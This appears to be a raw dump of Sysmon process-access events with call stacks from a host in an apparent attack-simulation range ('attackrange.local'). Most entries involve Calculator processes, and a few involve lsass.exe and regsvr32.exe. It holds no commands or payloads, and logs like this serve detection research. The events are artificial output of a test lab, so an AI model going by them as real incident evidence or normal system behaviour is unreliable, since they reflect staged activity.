22:13:28.397{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361918Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.382{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7d4e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ca7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+299b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f 10341000x8000000000000000361917Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.382{8e433fbf-337a-6013-7402-000000001100}62686312C:\Windows\system32\sihost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\usermgrcli.dll+112d|C:\Windows\system32\activationmanager.dll+f9dd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361916Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.382{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361915Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.382{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+33e55|C:\Windows\SYSTEM32\psmserviceexthost.dll+11fea|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361914Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.382{8e433fbf-337b-6013-8402-000000001100}16561560C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+4988e|C:\Windows\system32\twinui.pcshell.dll+4b3da|C:\Windows\system32\twinui.pcshell.dll+38af2|C:\Windows\system32\twinui.pcshell.dll+6fe9c|C:\Windows\System32\shcore.dll+b0b7|C:\Windows\system32\twinui.pcshell.dll+1dc45|C:\Windows\system32\twinui.pcshell.dll+623cb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000361913Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.382{8e433fbf-337a-6013-7402-000000001100}62681424C:\Windows\system32\sihost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\activationmanager.dll+cd0b|C:\Windows\system32\activationmanager.dll+c217|C:\Windows\system32\activationmanager.dll+bd76|C:\Windows\system32\activationmanager.dll+129de|C:\Windows\system32\activationmanager.dll+25a83|C:\Windows\system32\activationmanager.dll+9593|C:\Windows\system32\activationmanager.dll+54b7|C:\Windows\system32\activationmanager.dll+4591|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8 10341000x8000000000000000361912Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.382{8e433fbf-2a44-6013-0e00-000000001100}7124808C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361911Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.382{8e433fbf-2a44-6013-0e00-000000001100}7124808C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361910Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.382{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361909Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.350{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-3708-6013-b803-000000001100}6412C:\Windows\syswow64\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361908Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.350{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-3708-6013-b803-000000001100}6412C:\Windows\syswow64\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361907Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.350{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000361906Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.350{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000361905Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.350{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361904Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.350{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361903Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.350{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+2bc7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361902Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.350{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+2bc7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361901Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.350{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+6164|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361900Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.350{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+6164|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361899Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.350{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+6153|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361898Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.350{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+6153|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361897Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.350{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+6142|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361896Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.350{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 